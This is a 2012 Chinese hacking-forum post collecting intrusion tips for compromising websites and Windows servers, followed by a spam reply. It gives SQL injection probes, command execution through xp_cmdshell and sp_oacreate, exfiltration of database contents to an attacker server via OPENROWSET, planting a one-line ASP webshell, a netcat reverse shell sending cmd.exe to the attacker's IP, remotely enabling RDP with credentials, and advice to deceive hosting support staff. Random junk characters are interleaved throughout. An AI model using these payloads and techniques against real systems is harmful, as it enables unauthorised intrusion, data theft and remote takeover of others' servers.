找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3228|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
, ]( [/ e( \# B# F4 u
& D" g/ A+ s$ a& Q+ h+ Q, X: j# E! R, P8 h) C" I
SA点数据库分离搞法+语句:
  U) E. p4 W' a1 F
, q' @- {. J7 W& Z4 g注射点不显错,执行下面三条语句页面都返回正常。
+ p! D* c7 o3 L$ J( d+ N, p+ Rand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
. w: h, e" z9 f' j  O+ t, R; A& Yand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
: t! o- t; G2 `: J" G) P# g9 iand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
) N8 j- N9 J. h( ~" V8 K. M) j可以列目录,判断系统为2000,web与数据库分离$ ~! {+ ~8 W0 `& ^( b8 [9 z9 d- w
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
7 P0 ^, t* }/ T+ r2 j9 h在注射点上执行
$ A2 E2 o# t3 pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--' J4 [& [( b! L9 R* u" V
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP  C, e* E8 e: h$ x! z3 w
还有我用NC监听得其他端口都没有得到IP。$ x5 h5 K( p/ C% `
' [+ s  \. U& J8 ~" T# @7 g0 y/ _4 Y
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。" z$ E) d$ ^- U# {1 n" _( X
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
7 H2 _9 O+ O" f6 Y9 {2 i0 p! A8 n* Q/ h, l0 |; f+ ]  ^
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
: v, \) M- ~5 b. \  i. f8 ^; c3 E4 P/ @( t6 ^
现在就猜想是不是数据库是内网而且不能连外网。+ j. ~* Z. u* n* W0 [1 Z# n' n

7 T; U6 U8 [3 g) k3 Q6 y5 R8 J+ @6 X) H2 g  h
access导出txt文本代码
, D; G/ X/ N/ s5 u& w& _SELECT * into [test.txt] in 'd:\web\' 'text;' from admin) A+ N7 o2 c- W* X. Q( \
9 A- h" ^9 d: g1 w

- S4 |! A6 i" L2 i, E) o1 C6 \3 @# ~) k- l+ [9 H
自动跳转到指定网站代码头$ |- N- z8 E: E4 A0 b5 j
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>4 w2 ~. x1 C' [. A9 I3 X

+ D( Y. B9 L$ r3 I+ Y3 [
5 D/ {  p% v. ]" C6 i% u+ H2 s入侵java or jsp站点时默认配置文件路径:
" n/ ^) {& D+ W7 V# s4 R+ K: _' R\web-inf\web.xml
1 L& w7 u0 ?% q5 Vtomcat下的配置文件位置:5 H2 b# c; U3 y! R( B: |6 T
\conf\server.xml            (前面加上tomcat路径)
3 W4 s7 W% B: @0 c\Tomcat 5.0\webapps\root\web-inf\struts-config.xml/ \( X2 q$ Y. O. v

& U  M0 @3 M! ~8 X; O- o6 y7 @% @/ X9 x6 N0 h  s4 }6 E& o
: s4 n7 `% ]6 z, R+ a+ r7 T
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
5 P/ H# }1 {+ h1 }-1%23
( `, R" c. d3 J> ( R4 Q7 S5 m1 g$ V) P
<
; i) x# C& c+ L1 N9 {& T4 r1'+or+'1'='1" A/ N! K& j0 \  F
id=8%bf- S: e4 T' n  Z/ C! C2 q

! T0 ?% F6 ^* b7 H) i- p  X. Z全新注入点检测试法:
7 B6 h2 R  s  ?1 K. J2 {在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
4 V- e2 s7 N" W& t: h  h7 B( R+ j1 K( M$ C
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
& |1 l3 V- }5 ]6 H) P) H; t
8 R0 f9 C; Q  p% m: j搜索型注入判断方法:
0 f, D" C5 Z2 `, O北京%' and '1'='1' and '%'='+ \) X( O$ z5 B; `3 Z* a
北京%' and '1'='2' and '%'='
0 x" @5 b; o1 l  E8 E: g- {5 u: n( W" B" J, S; U

3 m  d( N3 u* P! C% l4 B4 YCOOKIES注入:" K9 a5 J) Y4 I- `6 ~
* c' s3 h- l5 H% N9 b' d
javascript:alert(document.cookie="id="+escape("51 and 1=1"));+ C- H; w: ]3 D. G

6 g0 K( o" D4 _1 I/ k2000专业版查看本地登录用户命令:' e- t" l' F1 d/ g8 S. }) ]! W, q
net config workstation
/ Z0 x* L& ~& Y) N: E
! D+ H( ~7 \; I% ]% E) p
) e0 `; `4 o( d. o2003下查看ipsec配置和默认防火墙配置命令:
! X% ^- u6 _% c& g$ e% k0 g/ ynetsh firewall show config
4 t/ M8 {  X) hnetsh ipsec static show all
0 w7 g5 q9 Y" R) M
; I6 F7 ^5 {4 B. X+ d4 y* g! D不指派指定策略命令:
! \9 j( O9 B# k+ }. Rnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
  W$ d  o# R5 _. I5 H2 H  V- Ynetsh ipsec static show policy all  显示策略名  F! C; t* T4 k! j9 b
; l3 T& P: {' d: e" ~
6 n3 ~6 S0 o/ \
猜管理员后台小技巧:
' L1 n# D) {5 s+ J) madmin/left.asp
: U) m# n% O( y! u- \* F' radmin/main.asp7 M! W- W: u# v) e* G7 W0 W
admin/top.asp
+ @) H2 A$ H! R3 q& r/ B5 m9 f! |7 p7 uadmin/admin.asp * n+ w4 D) L) F9 P+ J* Z( d, n
会现出菜单导航,然后迅雷下载全部链接( o" m" Z: c6 V! u/ o8 ^; A! e
& D! @9 C9 @( c4 W0 f
6 V: e7 J9 y9 }
社会工程学:
7 t0 c3 `2 c+ c0 A用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
6 k& L  ?( `6 J% ]- P: p% A- A然后去骗客服
& b5 m2 W% G' `1 p9 C! k
$ l  u5 o0 ]5 b# W1 Q5 x# f; s! j7 ?" S- B$ _  A
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: * M( c) m& X+ j. W4 r
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
# V- x/ l* m" w  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
/ _# p+ L) q  q' V9 ]# z$ ?- c7 ^# S5 q; t" a1 c  v" {: s5 P

! d5 j( k6 U5 W5 v( @2 F8 r* \7 m5 M/ f% K& q  ~: ]1 i
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)0 k* R4 Y( j7 l
, P: B2 e2 p7 @0 D; u5 Y: N. _
' Y* q5 K" C1 Z7 `$ S: T+ n' d
. _& o7 y5 b$ _$ T8 |3 [
CMD加密注册表位置
2 G6 `% K$ o7 g  G(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor' ], q8 x9 l9 A/ y( T
AutoRun
  T1 v2 _7 `5 ~; J7 u- G
. C4 F% w! D% f' `$ ]) i" [(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
) _/ _7 Q' p; |6 x/ A9 M0 VAutoRun+ O1 C2 S" e0 E/ T5 u4 h

0 c: i- P( \/ H5 z4 Y  B) k
# m; D/ {$ ^) v* {$ ~在找注入时搜索Hidden,把他改成test
( p/ D3 k9 z, V) \
, d  _% U" d) z& g  T* W, Q$ O
, K, K) t( x! |" h  n  s1 G# g8 f; u- i, H! i  h
mstsc /v:IP /console 3 ~) P$ x, q, M) m

+ o. T$ Q6 Y$ {9 w  G& T
8 A6 ^0 K- X4 j6 ?一句话开3389:
) X# x- J1 g7 S( ?0 C+ _0 A: C" h5 \, K/ U
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>    M/ K6 J1 i% B4 n- l: r7 E# i
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了./ Z7 J+ S; f) j) @
) Z- e5 y  @  s

3 P) C% N" U0 [4 `知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:( j" H' q$ ~. N
Insert into admin(user,pwd) values('test','test')
4 ^) J% n6 N* e" h& N2 Y0 ]. N4 i- Z; o

4 E2 X; A; Q$ ~; p& T8 QNC反弹
! |; s8 E  E- w先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
/ x# i& ]* h/ {7 y; Y7 n然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行). }4 \' Y& E% c7 c3 C8 j4 C0 I

$ f; `: u9 L1 \  n9 s; G2 j/ y* Y, w- s( b. e) z
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
* J1 {! k; o% k7 v# c
1 h. X6 G" }6 d7 ^7 U有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
  y2 }# {3 W7 x) R9 S例如:; I3 j2 {: q" r* j
subst k: d:\www\ 用d盘www目录替代k盘  b2 a% l3 T8 ~! a& ]# u' P
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表